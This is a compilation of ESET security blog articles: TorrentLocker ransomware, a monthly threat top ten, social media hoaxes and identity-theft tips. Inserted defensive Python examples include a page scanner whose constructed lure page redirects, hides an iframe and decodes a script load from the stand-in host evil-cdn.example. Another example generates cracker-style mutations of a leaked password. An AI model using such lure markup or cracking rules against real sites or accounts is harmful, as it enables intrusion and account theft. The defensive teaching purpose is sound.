TorrentLocker: Racketeering ransomware hits Ireland as well

Security experts at ESET have released their latest research into the notorious TorrentLocker malware, which has infected thousands of computer systems around the world, taking data hostage and demanding a ransom be paid to ensure its safe return.

In a technical white paper, researcher Marc-Étienne Léveillé describes how the TorrentLocker family of ransomware (detected as Win32/Filecoder.DI by ESET security products, though its creators apparently prefer the name “Racketeer”) has evolved since it was first sighted in February 2014.

Over the months since, TorrentLocker (so named because early versions of the malware set a Registry entry referencing the BitTorrent application) has become more sophisticated, and its operators have automated more of their operation.

For instance, in September Finnish researchers at Nixu Oy detailed a method by which victims of TorrentLocker could recover the contents of their encrypted files, without handing any money over to the criminals behind the attack.

Predictably, once they realised that the keystream could be extracted, the authors of TorrentLocker promptly released a new version with a changed encryption scheme, shutting the door on that loophole.
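The keystream extraction the article refers to is an instance of a generic stream-cipher failure: if every file is XORed with the same keystream, one file whose plaintext the victim still has (an old backup, an emailed copy, even a known file header) gives away the keystream, which then decrypts every other file over the same byte range. The following is an added illustration written for this page; it is not ESET's or Nixu's code and does not reproduce TorrentLocker's actual cipher. The SHA-256 counter-mode keystream, the key, and the two sample "files" are all constructed stand-ins, and the fixed variant with a per-file nonce is an assumption about how such a flaw is normally closed, not a description of what the malware authors did.

```python
"""Why a reused keystream lets victims decrypt their own files.

Added illustration, not ESET's or Nixu's code and not TorrentLocker's real
cipher. Any stream cipher behaves the same way: ciphertext = plaintext XOR
keystream, so a known plaintext reveals the keystream.
"""
import hashlib


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Stand-in counter-mode keystream: SHA-256(key || nonce || counter). (Assumption:
    a toy generator; a real cipher such as AES-CTR has the same reuse problem.)"""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_flawed(key: bytes, plaintext: bytes) -> bytes:
    """The flaw: a fixed nonce, so every file is XORed with the same keystream."""
    return xor_bytes(plaintext, keystream(key, b"\x00" * 8, len(plaintext)))


def encrypt_fixed(key: bytes, file_id: bytes, plaintext: bytes) -> bytes:
    """The repair: a per-file nonce gives each file its own keystream."""
    return xor_bytes(plaintext, keystream(key, file_id, len(plaintext)))


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known-plaintext attack: keystream = P XOR C over the bytes we know."""
    n = min(len(known_plaintext), len(ciphertext))
    return xor_bytes(known_plaintext[:n], ciphertext[:n])


def decrypt_with_keystream(ks: bytes, ciphertext: bytes) -> bytes:
    """Decrypts as far as the recovered keystream reaches; the tail stays encrypted."""
    n = min(len(ks), len(ciphertext))
    return xor_bytes(ks, ciphertext[:n]) + ciphertext[n:]


# Constructed sample "files" (not real victim data). The known file is longer
# than the secret one so the recovered keystream covers the whole secret file.
KNOWN_FILE = b"%PDF-1.4 constructed sample whose plaintext the victim still has " * 3
SECRET_FILE = b"Constructed spreadsheet contents the victim only has encrypted.  " * 2
KEY = b"attacker-secret-key-never-sent-to-victim"  # the victim never learns this


def recover_flawed() -> bytes:
    """Victim has KNOWN_FILE plus both ciphertexts, but not KEY."""
    ks = recover_keystream(KNOWN_FILE, encrypt_flawed(KEY, KNOWN_FILE))
    return decrypt_with_keystream(ks, encrypt_flawed(KEY, SECRET_FILE))


def recover_fixed() -> bytes:
    """Same attack against per-file nonces: file 1's keystream is useless for file 2."""
    ks = recover_keystream(KNOWN_FILE, encrypt_fixed(KEY, b"file-001", KNOWN_FILE))
    return decrypt_with_keystream(ks, encrypt_fixed(KEY, b"file-002", SECRET_FILE))


if __name__ == "__main__":
    print("flawed scheme, secret file recovered:", recover_flawed() == SECRET_FILE)
    print("fixed scheme, secret file recovered: ", recover_fixed() == SECRET_FILE)
```

Note that the attack needs no key at all; it also explains why the fix had to change the scheme rather than the key, since rotating a key that is still shared across files changes nothing.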

Another example: at first, victims had to email the criminals behind the malware to make payments and request decryption keys. Today this has been automated via a user-friendly payment page that explains how to pay in Bitcoin to receive the decryption software.

TorrentLocker payment page

But although the malware has become more sophisticated, in other ways it appears less professional.

Some of the screens displayed by TorrentLocker refer to “CryptoLocker” instead. Is this a case of laziness on the malware creator’s part, or a deliberate attempt to dupe users into searching for information about an unrelated (albeit just as notorious) piece of ransomware?

Furthermore, the gang behind TorrentLocker does not appear interested in maximising its potential pool of victims by striking at computer users around the globe.

Infected countries

ESET researchers have determined that spam campaigns used to distribute TorrentLocker have only targeted specific countries.

Typically, the malicious emails arrive in the form of a bogus message claiming to relate to an unpaid invoice, the delivery of a package, or a fine for an unpaid speeding ticket.

Malicious webpage, posing as government fine

The following list of countries targeted by the malicious email campaigns is notable for its surprising exceptions (the United States, for instance, is nowhere to be seen):

  • Australia
  • Austria
  • Canada
  • Czech Republic
  • Italy
  • Ireland
  • France
  • Germany
  • Netherlands
  • New Zealand
  • Spain
  • Turkey
  • United Kingdom

What the technical paper makes clear, however, is that the rewards to be made through the TorrentLocker malware are considerable. ESET’s research indicates that even though a mere 1.45% of victims are paying the ransom (570 of 39,670 infected systems), that has still made the criminals between $292,700 and $585,401 in Bitcoin.

And, according to data gathered from TorrentLocker’s C&C (command and control) servers, a jaw-dropping 284,716,813 documents have been encrypted to date.

One has to hope that a fair proportion of the victims have access to a recent, clean backup from which they can restore their precious data.

For much more detailed information about TorrentLocker, be sure to have a look at the technical white paper from ESET.

by Graham Cluley, We Live Security

Monthly Threat Report: November 2014

The Top Ten Threats

1. HTML/Refresh
Previous Ranking: 1
Percentage Detected: 3.13%

HTML/Refresh is a Trojan that redirects the browser to a specific URL hosting malicious software. The malware’s code is usually embedded in HTML pages.

2. Win32/Bundpil
Previous Ranking: 2
Percentage Detected: 2.33%

Win32/Bundpil.A is a worm that spreads via removable media. It contains a URL from which it tries to download several files; these are then executed, and HTTP is used to communicate with the C&C server and receive new commands. The worm may delete the following folders:

3. Win32/Adware.MultiPlug
Previous Ranking: 5
Percentage Detected: 1.93%

Win32/Adware.MultiPlug is a potentially unwanted application which, once present on a user’s system, may cause applications to display advertising pop-up windows during internet browsing.

4. Win32/TrojanDownloader.Wauchos
Previous Ranking: N/A
Percentage Detected: 1.48%

Wauchos is a Trojan that tries to download other malware from the Internet. It collects information about the operating system, its settings and the computer’s IP address, then attempts to send the gathered information to a remote machine. It can download files from a remote computer and/or the Internet, run executable files, create Registry entries and remove itself from the infected computer.

5. Win32/Sality
Previous Ranking: 8
Percentage Detected: 1.41%

Sality is a polymorphic file infector. When executed, it starts a service and creates or deletes Registry keys relating to security applications active on the system, and ensures that the malicious process restarts at each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes implemented by and associated with security solutions.


6. LNK/Agent.AK
Previous Ranking: 7
Percentage Detected: 1.35%

LNK/Agent.AK is a shortcut (link) file that chains commands so as to run legitimate code while executing the threat code in the background. Its effect is similar to the older autorun.inf type of threat. The vulnerability it relies on became known with the discovery of Stuxnet, as it was one of four vulnerabilities exploited by Stuxnet variants.

7. JS/Kryptik.I
Previous Ranking: 3
Percentage Detected: 1.29%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.

8. INF/Autorun
Previous Ranking: 10
Percentage Detected: 1.22%

INF/Autorun is a generic detection of versions of the autorun.inf configuration file created by malware. The malicious AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of all the available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in an attempt to hide the file from Windows Explorer.
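The description above gives an analyst two concrete things to check on a suspect drive: what the autorun.inf would actually launch, and whether the file has been given the Hidden and System attributes. The script below is an added example written for this page, not ESET's detection logic. It parses the [autorun] section as leniently as Windows does (junk and comment lines skipped, first key wins), lists every launch target, and raises red flags for the patterns worms use: executables tucked into RECYCLER-style folders, Explorer verb overrides, and an action= string that mimics the system's own "Open folder to view files" entry. The two autorun.inf texts are constructed, and the folder list is an assumption drawn from common worm behaviour rather than a complete rule set.

```python
"""Triage an autorun.inf: what would it run, and does it look planted?

Added example, not ESET's signature logic. Sample files are constructed.
"""
import os
import re
import stat

# Keys through which autorun.inf can cause code to run.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command",
               "shell\\explore\\command", "shell\\autoplay\\command")
# Folders removable-media worms commonly hide their executable in (assumed list).
HIDEOUT_DIRS = {"recycler", "recycled", "$recycle.bin", "system volume information"}


def parse_autorun(text: str) -> dict:
    """Lenient [autorun] parse: blank, comment and junk lines are skipped (Windows
    skips them too), keys are lower-cased and the first occurrence of a key wins."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line[0] in ";#":
            continue
        m = re.fullmatch(r"\[(.+?)\]", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values.setdefault(key.strip().lower(), value.strip().strip('"'))
    return values


def launch_targets(values: dict) -> list:
    """Everything the file could cause to run, as (key, target) pairs."""
    return [(k, values[k]) for k in LAUNCH_KEYS if k in values]


def assess_autorun(text: str) -> list:
    """(severity, message) findings: 'info' records a launch, 'suspicious' a red flag."""
    values = parse_autorun(text)
    findings = []
    for key, target in launch_targets(values):
        findings.append(("info", f"{key}= would run {target}"))
        parts = [p.lower() for p in re.split(r"[\\/]", target)]
        if HIDEOUT_DIRS.intersection(parts):
            findings.append(("suspicious", f"{key}= points into a folder worms hide in ({target})"))
        if key.startswith("shell\\"):
            findings.append(("suspicious", f"{key}= hijacks an Explorer verb so opening the drive runs {target}"))
    if values.get("action", "").lower().startswith("open folder"):
        findings.append(("suspicious", "action= mimics the 'Open folder to view files' AutoPlay entry"))
    return findings


def hidden_or_system(path: str) -> bool:
    """True when the file carries the Hidden or System attribute (Windows; False elsewhere)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & (stat.FILE_ATTRIBUTE_HIDDEN | stat.FILE_ATTRIBUTE_SYSTEM))


# Constructed samples: a plain installer disc and a worm-planted file.
BENIGN = r"""[autorun]
open=setup.exe
icon=setup.exe,0
label=Product Installer
"""

PLANTED = r"""[autorun]
;junk lines like this one are ignored by Windows, so they cost a worm nothing
open=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\vshost.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\vshost.exe
shell\explore\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\vshost.exe
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("planted", PLANTED)):
        print(name)
        for severity, msg in assess_autorun(sample):
            print(f"  [{severity}] {msg}")
```

Run it against a real drive by reading `X:\autorun.inf` into `assess_autorun` and calling `hidden_or_system` on the same path; the combination of a verb override, a hideout folder and hidden attributes is what the generic detection above is describing.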

9. Win32/Ramnit
Previous Ranking: N/A
Percentage Detected: 1.17%

This is a file infector that executes every time the system starts. It infects .dll (dynamic-link library) and .exe executable files, and also searches for .htm and .html files in order to insert malicious instructions into them. It exploits a vulnerability found on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send information it has gathered, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

10. HTML/ScrInject
Previous Ranking: 6
Percentage Detected: 1.08%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect to the malware download.
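Three of the entries above (HTML/Refresh, JS/Kryptik and HTML/ScrInject) describe the same family of page-level tricks: a meta refresh that sends the browser elsewhere, an iframe sized or styled to be invisible, and inline script that is obfuscated before it writes the real payload. The scanner below is an added example for this page, not ESET's signatures; it walks an HTML document with the standard library parser and reports each of those traits. The sample page, the hosts `evil-cdn.example` and `trusted.example`, and the obfuscation thresholds are all constructed or assumed, so treat the output as triage hints to tune rather than verdicts.

```python
"""Flag the page patterns behind HTML/Refresh, JS/Kryptik and HTML/ScrInject.

Added example, not ESET's detection logic. Sample pages are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode(", "atob(", "document.write(")
ENCODED_RUN = 30  # assumed threshold: this many %xx/\xNN escapes or char codes in one script


class PageScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one HTML document."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
            if m:
                self._check_host("meta refresh", m.group(1))
        elif tag == "iframe":
            if self._invisible(a):
                self.findings.append(("hidden iframe", a.get("src", "")))
            elif a.get("src"):
                self._check_host("iframe", a["src"])
        elif tag == "script":
            self._in_script, self._script = True, []
            if a.get("src"):
                self._check_host("external script", a["src"])

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self._check_obfuscation("".join(self._script))

    def _check_host(self, what, url):
        """Anything that pulls the browser to a host other than the page's own."""
        host = urlparse(url).hostname
        if host and host.lower() != self.site_host:
            self.findings.append((what + " to foreign host", url))

    @staticmethod
    def _invisible(a):
        style = a.get("style", "").replace(" ", "").lower()

        def zero(v):
            return re.sub(r"px$", "", v.strip().lower()) in ("0", "1")

        return (zero(a.get("width", "")) or zero(a.get("height", ""))
                or "display:none" in style or "visibility:hidden" in style)

    def _check_obfuscation(self, js):
        """Decoder call plus a long run of encoded bytes is the usual Kryptik shape."""
        low = js.lower()
        markers = [m for m in OBFUSCATION_MARKERS if m in low]
        escapes = len(re.findall(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", low))
        codes = len(re.findall(r"\b\d{2,3}\s*,", low))  # String.fromCharCode(104,116,...) style
        if markers and max(escapes, codes) >= ENCODED_RUN:
            self.findings.append(("obfuscated script", ", ".join(markers)))


def scan_html(html: str, site_host: str) -> list:
    scanner = PageScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a lure page that redirects, hides an iframe and decodes its payload.
SAMPLE_PAGE = """<html><head><title>Invoice</title>
<meta http-equiv="refresh" content="0; url=http://evil-cdn.example/go.php">
</head><body><p>Loading your invoice, please wait...</p>
<iframe src="http://evil-cdn.example/ld.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>
var p = "%3Cscript%20src%3D%22http%3A%2F%2Fevil-cdn.example%2Fx.js%22%3E%3C%2Fscript%3E""" + "%20" * 40 + """";
document.write(unescape(p));
</script>
<script src="/js/site.js"></script>
</body></html>"""

BENIGN_PAGE = """<html><body><script src="/js/site.js"></script>
<iframe src="https://trusted.example/widget" width="300" height="200"></iframe></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "trusted.example"):
        print(f"{kind}: {detail}")
```

The same-host check is deliberately simple; a real deployment would also whitelist the site's CDN hosts, otherwise every legitimate external script shows up as a finding.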

Trust, Truth and Hoaxes in Social Media

Social networks irritate many of us at least part of the time, but they have their good points. While some networks have a habit of moving the security goalposts from time to time for the benefit of their real customers – i.e. those who are paying for upgrades from the free service, or to take advantage of marketing potential – they offer lots of opportunities for people to connect (or re-connect) with friends or colleagues, share information of local or specialist interest, show off selfies to an audience that won’t usually be too critical of blurriness and trees growing out of heads, and publish flash-heavy over-exposed views of the meal they just demolished. (OK, some types of post are more interesting than others…)

Of course, you need to be aware that you – or at any rate your purchasing habits and, on occasion, other activities and characteristics – are the commodity, not the customer, as we security drones are always anxious to remind you. But you also need to bear in mind that the details of day-to-day human contact can be magnified enormously for an online community, whether it’s an official group you belong to or your own contact list, and there are good and bad aspects to that. It’s certainly gratifying for many people to reach people across the globe with photographs of a new baby, for example, with a single post. On the other hand, if your dress sense is harshly criticized by someone in the same room, it’s possibly less humiliating than being flamed for your grammar or an alleged lack of intelligence in a group with 300,000 members.

If someone shares misinformation with you on the bus or in a bar, it may have relatively little impact on the community at large. But I’ve often described social media as the natural supplement to or even replacement of email as the hoaxer’s weapon of choice, and because the last thing social media are noted for is restricting the flow of information (or misinformation), they could well be described as a weapon of mass deception. It’s not that users are automatically gullible or stupid, though I often see comments on blog articles here that suggest that they are. In fact, we shouldn’t underestimate the potential of a social network as an educational tool.

Premium Rate Semi-Hoax

Every year at around this time, I see warnings like this about a scam intended to trick victims into calling a premium rate number.

“Can you circulate this around especially as Xmas is fast approaching – it has been confirmed by Royal Mail. The Trading Standards Office are making people aware of the following scam:

A card is posted through your door from a company called PDS (Parcel Delivery Service) suggesting that they were unable to deliver a parcel and that you need to contact them on 0906 6611911 (a Premium rate number).

DO NOT call this number, as this is a mail scam originating from Belize. If you call the number and you start to hear a recorded message you will already have been billed £315 for the phone call.

If you do receive a card with these details, then please contact Royal Mail Fraud on 020 7239 6655.”

Snopes cites almost the same message but with a little extra that I can’t resist quoting:

Hi all just received this via a solicitors office so we know it’s genuine. 

(Apologies to any of my lawyer friends who are offended by my finding this amusing. There will now be a short break while I try to remember whether I have any lawyer friends. If not, now might be the time when I need one.)

As Snopes points out, there is (or rather was, in 2005) some truth in this, though the £315 phone bill is wildly exaggerated. According to Action Fraud, PhonepayPlus issued the following statement. The PhonepayPlus site shows a link to a statement, but the page it links to seems to have been moved or removed, else I’d have linked it directly. However, it reads much as I remember it.

  • The chain email refers to a service (operating on 0906 6611911) that was shut down by PhonepayPlus (then ICSTIS) in December 2005.
  • PhonepayPlus subsequently fined the company that was operating the service, Studio Telecom (based in Belize), £10,000.
  • The service is NO LONGER running and has NOT been running since December 2005.
  • You do NOT need to contact PhonepayPlus, or the Royal Mail, about this service as it was stopped almost eight years ago.
  • If you receive a copy of the email warning you about the alleged scam, please do NOT forward it to others. Instead, please forward this statement from PhonepayPlus. 
  • If you receive a delivery card through your letterbox which you do not believe is genuine and which asks you to dial a premium rate number, you can contact PhonepayPlus on 0800 500 212 (Mon-Fri, 8am-6pm) for further guidance.

Shooting the Messenger

Because hoaxes became an obsession of mine long before I joined the security industry – an obsession with fighting them, that is, not creating them – I usually find myself pointing out that stuff like this is a hoax, despite the fact that I sometimes get bad-tempered responses from people who refuse to believe it. Recently, however, I saw an instance where the message above was posted to a Facebook group and got an immediate response from several people who recognized it as a hoax (long before I got to it). So sometimes the message does get through, and education does work (to an extent). While hoaxers are helped by the fact that when lots of people spread misinformation, this will be seen as somehow more corroborative than if only isolated instances are seen, it’s clear that people are likelier to believe that a hoax is a hoax if several of their friends say so, rather than one ‘so-called expert.’ (Takes a sardonic bow…)

However, it’s important to note that while this particular scam is no longer current, the principle on which it works is one that could be revived. Certainly there is no shortage of scams meant to trick the unwary into ringing premium rate numbers.

Nevertheless, old favourites do resurface that have little or no basis in fact. Since 2012 this image has regularly recirculated on Facebook.

Your Contract with Facebook

Of course, it isn’t usually conveniently tagged as a hoax: I inserted that text because it’s not unknown for people to look at something like this without reading further, so they may think that it’s genuine. But it certainly isn’t genuine, as you might guess from the number of times it gets reposted. Facebook does have a Statement of Rights and Responsibilities that ‘governs [its] … relationship with users and others who interact with Facebook.’ Snopes points out that one of these provisions is:

You will not post content that: is hate speech, threatening or pornographic; incites violence; or contains nudity or graphic or gratuitous violence.

In fact, there’s a great deal more to that Statement (and there are many good reasons for looking through it, as we’ll see in a minute), but there’s certainly no suggestion there that religious images are forbidden in their own right. It would, presumably, be another matter entirely if they fell into one of the categories of unacceptable content defined in that extract and other parts of the Statement (such as the one that mentions copyright infringement). Hoax-Slayer suggests that the hoax originates with attention-seeking individuals trying to boost their page stats.

Given how many subscribers Facebook actually has, it’s slightly odd that so many of them regard it with such suspicion, yet make such frequent use of it. Certainly, what you post to Facebook (including unequivocal Intellectual Property) is not entirely your own, as that Statement of Rights and Responsibilities makes perfectly clear. As a result many people have posted this disclaimer or a close variant in the belief that it will allow them more control over their content:

I do declare the following: on this day, [Month] [Day], [Year], in response to the new Facebook guidelines and under articles L.111, 112 and 113 of the code of intellectual property, I declare that my rights are attached to all my personal data, drawings, paintings, photos, texts etc… published on my profile. For commercial use of the foregoing my written consent is required at all times.
Those reading this text can copy it and paste it on their Facebook wall. This will allow them to place themselves under the protection of copyright.
By this release, I tell Facebook that it is strictly forbidden to disclose, copy, distribute, broadcast, or to take any other action against me on the basis of this profile and/or its contents. The actions mentioned above apply equally to employees, students, agents and/or other staff under the direction of Facebook.
The contents of my profile include private information. The violation of my privacy is punished by the law (UCC 1 1-308 – 308 1 -103 and the Rome Statute). Facebook is now an open capital entity.
All members are invited to post a notice of this kind, or if you prefer, you can copy and paste this version.
If you have not published this statement at least once, you will tacitly allow the use of elements such as your photos as well as the information contained in your profile update.

However, your agreement with Facebook is a contract, as is the case with other social media providers: you can’t use a unilateral statement like this to opt out of the contract stipulations you agreed with the company when you joined, as long as they’re conditions that Facebook can legally impose (or modify, if it chooses). You can try to negotiate a non-standard contract with a provider, but a service with hundreds of millions of subscribers isn’t likely to consider one-to-one contract variations, especially when it isn’t charging for the service it provides.

Continuing use of the service is conditional on acceptance of its terms of service and data use policy, and a change in Facebook’s legal status as an entity doesn’t in principle affect its rights to use its users’ information and content. Reproducing that disclaimer has no real legal force.

The good news is that those rights aren’t as comprehensive as has been suggested. Facebook put it like this, back in 2012.

Anyone who uses Facebook owns and controls the content and information they post, as stated in our terms. They control how that content and information is shared. That is our policy, and it always has been.

Though that 2012 page seems to have disappeared from the site, an earlier post still survives that expresses Facebook’s difficulty in reconciling conflicting user expectations:

Our philosophy is that people own their information and control who they share it with. When a person shares information on Facebook, they first need to grant Facebook a license to use that information so that we can show it to the other people they’ve asked us to share it with. Without this license, we couldn’t help people share that information.


People want full ownership and control of their information so they can turn off access to it at any time. At the same time, people also want to be able to bring the information others have shared with them—like email addresses, phone numbers, photos and so on—to other services and grant those services access to those people’s information. These two positions are at odds with each other.

More legalistically expressed, in its Statement of Rights and Responsibilities, the company states that:

…subject to your privacy and application settings: you grant us a non-exclusive, transferable, sub-licensable, royalty-free, worldwide licence to use any IP content that you post on or in connection with Facebook (IP Licence). This IP Licence ends when you delete your IP content or your account, unless your content has been shared with others and they have not deleted it.

The essence of the Facebook service is to facilitate on your behalf the sharing of the content you choose to share, subject to the control it allows you over where and to whom it is shared. That licence agreement is what Facebook deems necessary to enable it to provide that service. And it is an agreement: if you’re using the service, you’ve agreed to it, even if you haven’t read it. That’s how contractual obligation works. If your account (or the content) is deleted, the company relinquishes its right to it, though Facebook has stated that when it deletes your account, it doesn’t delete data that have been shared so that they could still be found on someone else’s account or even outside Facebook. Which is pretty much how Internet services work anyway. (For example, once I’ve sent email to you, I can, via my mail provider, delete it from my account but not from yours, let alone from the account of anyone you’ve shared it with.)

Pity the Poor Politician

If people find it hard to be fully sympathetic to social networks, they seem to find it even harder to raise some sympathy for politicians, in general. I have long thought that in a rational world, wanting to be a politician would automatically disqualify an aspiring representative of the people, or at least require comprehensive evaluation of his or her mental health. So I can understand that people are ready – especially in times of economic hardship – to expect the worst from their leaders. It doesn’t help when politicians are most often seen in public milking media opportunities and slagging off the opposition.

In the UK, a common group of memes analysed by The Spectator purports to demonstrate that most Members of Parliament only turn out in force for debates in the House of Commons to discuss their own salaries. But when social networks are used as a forum for political discussion, all is not always what it seems, for several reasons.

  • A snapshot of the chamber at a given moment in the course of a long-running debate may give a seriously misleading impression of how many MPs (and which MPs) participated overall.
  • Parliamentarians do a lot of work (no, honestly!) apart from attending debates: as Isobel Hardman’s article puts it:

When debates go on for several hours, MPs often pop in and out as they have other business going on at the same time. They may be in a select committee, meeting constituents, taking part in a Westminster Hall debate, running an all-party parliamentary group meeting, briefing journalists, plotting a rebellion with colleagues or working in their office.

  • There’s even an argument that how much MPs are paid is important, given the influence they have on the lives of the rest of us. I suppose. Though there are MPs I would actually pay to stay away from Westminster, if I could afford it. (Let’s not talk about expenses fiddling and ex gratia consultancy fees: I’m depressed enough as it is.) And in fact, MPs’ salaries are apparently now set by an independent body in any case. But that argument isn’t really relevant because…
  • …many of the photographs deployed to support this meme have been totally (and presumably deliberately) misrepresented. For instance, a photo showing a packed chamber (I’m talking about lots of MPs in the same room, not attempts to game the democratic process!) that is claimed to have been taken at a debate on MPs’ expenses or pay actually shows Prime Minister’s Question Time. If you’ve ever seen Prime Minister’s Questions – characteristically a choice mixture of sycophancy, cheap insults across the floor, and general bad behaviour – you may think that’s no better than an expenses debate, but that’s a different discussion.


There’s a very simple moral to this article. Not everything you see on the Internet in general or social media in particular is gospel truth. Sometimes interesting or gratifying or controversial facts, posts and memes are complete fabrications. The fact that tens of thousands of people have ‘Liked’ an article doesn’t prove that it’s true. (Though it doesn’t prove that it isn’t, either.) The fact that one or more of your very intelligent and well-informed friends posted it isn’t conclusive proof that it’s accurate, either. Sometimes, very bright people fall for bogus messages because they want to believe them: for instance, because they fit with their political views, or offer some exciting gift, or refer to some threat that they don’t have the technical knowledge to recognize as improbable. Intelligence and omniscience are not synonyms. Sometimes, people just don’t care: they like the story the message tells too much to check it. A while ago on this blog I said:

E.M. Forster said something like “the confidence trick is the work of man, but the want-of-confidence trick is the work of the devil.” The fact is, though, that a little paranoia can save a lot of heartache, and some very bad men rely on the gullibility of others.

I was talking about education as a countermeasure against social engineering in general, but a little scepticism goes a long way towards countering hoaxes, too. I suspect that the sort of extreme scepticism (or paranoia) that tends to characterize security researchers is something you either have or don’t have, but here are a couple of resources you might find interesting anyway.

  • Truth, Lies and the Internet, a Demos report referenced in the Spectator article, is focused on ‘young people’s digital fluency’, but many of the points made are highly relevant to the community in general.
  • Here’s an article by Maria Popova that summarizes Carl Sagan’s Baloney Detection Kit.

HT to Richi Jennings for drawing my attention to the Spectator article.

by David “Of course, I could be lying about all this” Harley
ESET Senior Research Fellow

Six tips to help prevent identity theft online

Private data such as addresses and other personal details can be just as valuable to cybercriminals intent on identity theft as valid credit card details can be to thieves – if not more so.

Knowing the name, address history and ID numbers of someone with good credit allows a thief to steal not just once – but many times.

What is shocking is how freely many people hand out data which forms the building blocks of identity theft.

A Microsoft survey of 10,000 consumers in 2014 found that the worldwide annual cost of identity theft and phishing could be as high as $5 billion – and the cost of repairing damage to people’s reputation online could be even higher: up to $6 billion, with the 10,000 consumers polled by Microsoft losing an average of $632.

The survey found that out of more than 10,000 consumers surveyed, 15% said that they had been a victim of phishing, losing an average of $158, a further 13% said their professional reputation had been compromised, costing on average $535 to repair, and 9% said they had suffered identity theft at an average cost of $218.

Thankfully, there are steps you can take both to check that your data is not already available in ‘the wild’ – but also to lock it down so that cybercriminals will (hopefully) ignore you in favour of easier targets.

1. Identity theft: know the warning signs

Signs that your identity details are being used for fraud include letters from your bank appearing to drop in frequency (identity thieves frequently change your banking address so that letters don’t reach you), and letters from financial institutions you don’t recognise.

Keep track of the dates on which you normally receive bills, and call the institution if one doesn’t arrive. And always read anything from financial institutions you DON’T recognise.

It’s very easy to dismiss such letters as junk mail – but if you receive a letter from a loan company or credit card company, it’s worth reading to check that someone is not taking loans in your name.

2. If you are posting sensitive information, post it yourself

mail a letter

If you are applying for a credit card, or sending a tax return, you’re sending enough information for a cybercriminal to make money from identity theft.

Don’t send it via a mailbox where it could be stolen (for example, via an employer’s internal mail system). Go directly to a post office, and put it into the box yourself.

3. Even if you have been banking online for years, change the password

change your password

Your bank and credit card company passwords are among the most important ones you have when it comes to protecting yourself against identity theft – but if you’ve been using the same service for years, it’s easy to keep using the same old, weak password.

Change it. ESET has published a guide to making passwords as strong as possible.

If your site forces you to change your password periodically, do so using strong passwords.

Users often respond to such requests by adding the required special characters to the end of passwords, or adding numbers there instead. If your password leaks, this is among the first things a password cracker will try.

ESET Senior Research Fellow David Harley says, “This also applies where the site requires you to change your password periodically but allows you to do so by appending a number. Password cracking 101.”
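The reason appending a digit is "password cracking 101" is that cracking tools do not guess new passwords from scratch when an old one has leaked; they apply cheap mangling rules to it. The script below is an added example for this page, not ESET's or David Harley's code. It builds the candidate set a cracker derives from one leaked password (append or bump a trailing number, add a symbol, change a year, flip case, swap letters for look-alikes) and reports whether a proposed replacement falls inside it. The rule set is a small assumed sample of what real rule files contain, so a password this code fails to derive is not thereby safe; it only shows how little work the common "fixes" cost an attacker.

```python
"""Why appending a digit to an old password is not a new password.

Added example, not ESET's code; the rule set is an assumed small sample.
"""
import re

SYMBOLS = "!?*#$@"


def derived_candidates(leaked: str, years=range(2010, 2026)) -> set:
    """Passwords a cracker derives from one leaked password with cheap rules."""
    # Drop an existing numeric/symbol suffix so "welcome1" also yields "welcome2".
    stripped = re.sub(r"[\d!?*#$@]+$", "", leaked) or leaked
    stems = {leaked, leaked.lower(), leaked.capitalize(), leaked.swapcase(),
             stripped, stripped.lower(), stripped.capitalize()}
    suffixes = [str(n) for n in range(100)] + [str(y) for y in years] + list(SYMBOLS)
    cands = set()
    for stem in stems:
        for suf in suffixes:
            cands.add(stem + suf)
            for sym in SYMBOLS:          # "Welcome2!" style: digit then symbol
                cands.add(stem + suf + sym)
    # Bump an existing trailing number: Summer2014 -> Summer2015, welcome1 -> welcome2.
    m = re.search(r"(\d+)(\D*)$", leaked)
    if m:
        num, tail = m.group(1), m.group(2)
        for delta in range(-2, 4):
            cands.add(leaked[:m.start(1)] + str(int(num) + delta).zfill(len(num)) + tail)
    # One round of the usual look-alike swaps.
    leet = leaked.translate(str.maketrans("aeios", "@310$"))
    cands.update({leet, leet + "1", leet + "!"})
    cands.discard(leaked)
    return cands


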